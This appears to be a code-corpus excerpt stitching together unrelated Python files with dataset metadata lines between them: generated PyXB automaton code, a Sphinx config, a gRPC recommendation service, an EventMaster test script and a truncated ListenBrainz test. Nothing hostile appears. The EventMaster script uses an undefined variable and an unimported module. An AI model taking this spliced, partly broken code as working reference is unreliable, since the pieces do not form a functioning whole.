transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_14, False) ]))
st_16._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_15, True) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_15, False) ]))
st_17._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_16, True) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_16, False) ]))
st_18._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_17, True) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_17, False) ]))
st_19._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_18, True) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_18, False) ]))
st_20._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_19, True) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_19, False) ]))
st_21._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_20, True) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_20, False) ]))
st_22._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_21, True) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_21, False) ]))
st_23._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_22, True) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, True) ]))
st_35._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
groupType._Automaton = _BuildAutomaton_30()
| gpl-3.0 | -2,637,278,550,881,976,000 | 56.410293 | 918 | 0.716241 | false |
mRokita/DPLib | docs_src/conf.py | 1 | 4933 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# DPLib documentation build configuration file, created by
# sphinx-quickstart on Wed Jun 28 11:28:21 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
import os
import sys
import sphinx_rtd_theme
sys.path.insert(0, os.path.abspath('..'))
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'DPLib'
copyright = '2017-2018, Michał Rokita'
author = 'Michał Rokita'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.5'
# The full version, including alpha/beta/rc tags.
release = '1.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'DPLibdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DPLib.tex', 'DPLib Documentation',
'Michał Rokita', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'dplib', 'DPLib Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DPLib', 'DPLib Documentation',
author, 'DPLib', 'One line description of project.',
'Miscellaneous'),
]
| agpl-3.0 | 6,852,914,549,952,779,000 | 28.345238 | 79 | 0.671805 | false |
census-ecosystem/opencensus-microservices-demo | src/recommendationservice/recommendation_server.py | 1 | 4084 | #!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import grpc
from concurrent import futures
import time
import traceback
import random
import os
import googleclouddebugger
import demo_pb2
import demo_pb2_grpc
from grpc_health.v1 import health_pb2
from grpc_health.v1 import health_pb2_grpc
# TODO(morganmclean,ahmetb) tracing currently disabled due to memory leak (see TODO below)
# from opencensus.trace.ext.grpc import server_interceptor
# from opencensus.trace.samplers import always_on
# from opencensus.trace.exporters import stackdriver_exporter
# from opencensus.trace.exporters import print_exporter
class RecommendationService(demo_pb2_grpc.RecommendationServiceServicer):
def ListRecommendations(self, request, context):
max_responses = 5
# fetch list of products from product catalog stub
cat_response = product_catalog_stub.ListProducts(demo_pb2.Empty())
product_ids = [x.id for x in cat_response.products]
filtered_products = list(set(product_ids)-set(request.product_ids))
num_products = len(filtered_products)
num_return = min(max_responses, num_products)
# sample list of indicies to return
indices = random.sample(range(num_products), num_return)
# fetch product ids from indices
prod_list = [filtered_products[i] for i in indices]
print("[Recv ListRecommendations] product_ids={}".format(prod_list))
# build and return response
response = demo_pb2.ListRecommendationsResponse()
response.product_ids.extend(prod_list)
return response
def Check(self, request, context):
return health_pb2.HealthCheckResponse(
status=health_pb2.HealthCheckResponse.SERVING)
if __name__ == "__main__":
print("initializing recommendationservice")
# TODO(morganmclean,ahmetb) enabling the tracing interceptor/sampler below
# causes an unbounded memory leak eventually OOMing the container.
# ----
# try:
# sampler = always_on.AlwaysOnSampler()
# exporter = stackdriver_exporter.StackdriverExporter()
# tracer_interceptor = server_interceptor.OpenCensusServerInterceptor(sampler, exporter)
# except:
# tracer_interceptor = server_interceptor.OpenCensusServerInterceptor()
try:
googleclouddebugger.enable(
module='recommendationserver',
version='1.0.0'
)
except Exception, err:
print("could not enable debugger")
traceback.print_exc()
pass
port = os.environ.get('PORT', "8080")
catalog_addr = os.environ.get('PRODUCT_CATALOG_SERVICE_ADDR', '')
if catalog_addr == "":
raise Exception('PRODUCT_CATALOG_SERVICE_ADDR environment variable not set')
print("product catalog address: " + catalog_addr)
channel = grpc.insecure_channel(catalog_addr)
product_catalog_stub = demo_pb2_grpc.ProductCatalogServiceStub(channel)
# create gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) # ,interceptors=(tracer_interceptor,))
# add class to gRPC server
service = RecommendationService()
demo_pb2_grpc.add_RecommendationServiceServicer_to_server(service, server)
health_pb2_grpc.add_HealthServicer_to_server(service, server)
# start server
print("listening on port: " + port)
server.add_insecure_port('[::]:'+port)
server.start()
# keep alive
try:
while True:
time.sleep(10000)
except KeyboardInterrupt:
server.stop(0)
| apache-2.0 | 186,685,864,770,840,540 | 36.127273 | 107 | 0.706905 | false |
kyelewisstgc/EventMaster-Python | tests/test_old.py | 1 | 4851 | #Import Libraries
import eventmaster as EM
from time import sleep
import random
import sys
def run_test(name_string, command_send_string, command_recieve_string, test_untyped):
sys.stdout.write('{0!s} Test ...'.format(name_string))
guid_1 = eval(command_send_string)
while s3.has_been_processed(guid_1) != 1:
time.sleep(1)
sys.stdout.write('.')
sys.stdout.flush()
test_rtn = eval(command_recieve_string)
if(test_rtn == test_untyped):
print(' [OK]')
else:
print(' [FAILED]')
print(" {0!s} was {1!s}, should have been {2!s}".format(name_string, test_rtn, test_untyped))
""" Create new Instance of EventMasterSwitcher and turn off logging """
s3 = EM.EventMasterSwitcher()
s3.setVerbose(0)
""" Wait for a device to be discovered on the local network """
while not s3.getDiscovery():
print("Discovering Devices...")
sleep(2)
""" Retrieve the first discovered device """
discovered_devices = s3.getDiscovery()
dev = discovered_devices[0]
print( ("Using discovered {0!s} named {1!s} on version {4!s} at {2!s}:{3!s}"
"").format(dev['Type'],
dev['Name'],
dev['IP'],
dev['Port'],
dev['OSVersion']) )
""" Connect to the device """
s3.setIP(first_ip)
if not s3.start():
print("Error Connecting to E2/S3.")
""" s3.isReady returns 0 if no connection, 1 if connected and synced, or 2 if
connected but waiting for sync """
while s3.isReady() != 1:
print("Waiting for E2/S3 to be ready...")
sleep(1)
print("Connected!")
""" Enumerate all Inputs and print known information for each """
print("# Inputs")
for input_id in s3.enumInputs():
frzmode_int = s3.getInput(input_id).getFreeze()
state_string = ""
state_string = "is Frozen" if frzmode_int == 1 else "is not Frozen"
print(" ({0!s}) {1!s} {2!s}".format(input_id, s3.getInput(input_id).getName(), state_string))
""" Enumerate all Destinations and print known information for each """
print("\r\n# Destinations:")
for dest_id in s3.enumDestinations():
dest_layers = s3.enumLayers(dest_id)
print(" ({0!s}) {1!s} is {2!s} x {3!s}".format(dest_id, s3.dests[dest_id]['Name'], s3.dests[dest_id]['HSize'], s3.dests[dest_id]['VSize']) )
print(" ({0!s}) has {1!s} layers".format(dest_id, len(dest_layers)))
""" Enumerate all Layers for Destination and print known information for each """
for layer_id in dest_layers:
layer_name = s3.getLayer(dest_id, layer_id).getName()
layer_owin = s3.getLayer(dest_id, layer_id).getOWIN()
layer_hpos = layer_owin["HPos"]
layer_hsize = layer_owin["HSize"]
layer_vpos = layer_owin["VPos"]
layer_vsize = layer_owin["VSize"]
size_string = " is {0!s}x{1!s} at {2!s},{3!s}".format(layer_hsize, layer_vsize, layer_hpos, layer_vpos)
print(" ({0!s}) {1!s} {2!s}".format(layer_name, s3.getLayer(dest_id, layer_id).getName(), size_string))
"""
print("\r\n# Input Tests:")
for input_id in s3.enumInputs():
run_test("{0!s} Freeze".format(input_id), "s3.get_input({0!s}).setFreeze(eventmaster.FRZMODE_ON)".format(input_id), "s3.get_input({0!s}).get_Freeze()".format(input_id), 1)
run_test("{0!s} Un-Freeze".format(input_id), "s3.get_input({0!s}).setFreeze(E2S3.FRZMODE_OFF)".format(input_id), "s3.get_input({0!s}).get_Freeze()".format(input_id), 0)
test_str = "PYTEST-{0!s}".format(random.randint(1,10))
run_test("{0!s} Name".format(input_id), "s3.get_input({0!s}).set_Name(\"{1!s}\")".format(input_id, test_str), "s3.get_input({0!s}).get_Name()".format(input_id), test_str)
print("\r\n# Destination Tests:")
for dest_id in s3.enum_dests():
dest_layers = s3.enum_layers(dest_id)
for layer_id in dest_layers:
id_string = "{0!s}/{1!s}".format(dest_id, layer_id)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_HPos".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_HPos({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_HPos()".format(dest_id, layer_id), test_int)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_VPos".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_VPos({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_VPos()".format(dest_id, layer_id), test_int)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_HSize".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_HSize({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_HSize()".format(dest_id, layer_id), test_int)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_VSize".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_VSize({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_VSize()".format(dest_id, layer_id), test_int)
"""
print("Disconnecting from E2/S3")
s3.stop()
quit()
| mit | -1,224,262,246,352,609,000 | 35.473684 | 219 | 0.638013 | false |
Freso/listenbrainz-server | listenbrainz/tests/integration/test_api.py | 1 | 36910 | import json
import time
import pytest
from flask import url_for
import listenbrainz.db.user as db_user
import listenbrainz.db.user_relationship as db_user_relationship
from listenbrainz import db
from listenbrainz.tests.integration import ListenAPIIntegrationTestCase
from listenbrainz.webserver.views.api_tools import is_valid_uuid
class APITestCase(ListenAPIIntegrationTestCase):
def setUp(self):
super(APITestCase, self).setUp()
self.followed_user = db_user.get_or_create(3, 'followed_user')
self.follow_user_url = url_for("social_api_v1.follow_user", user_name=self.followed_user["musicbrainz_id"])
self.follow_user_headers = {'Authorization': 'Token {}'.format(self.user['auth_token'])}
def test_get_listens_invalid_count(self):
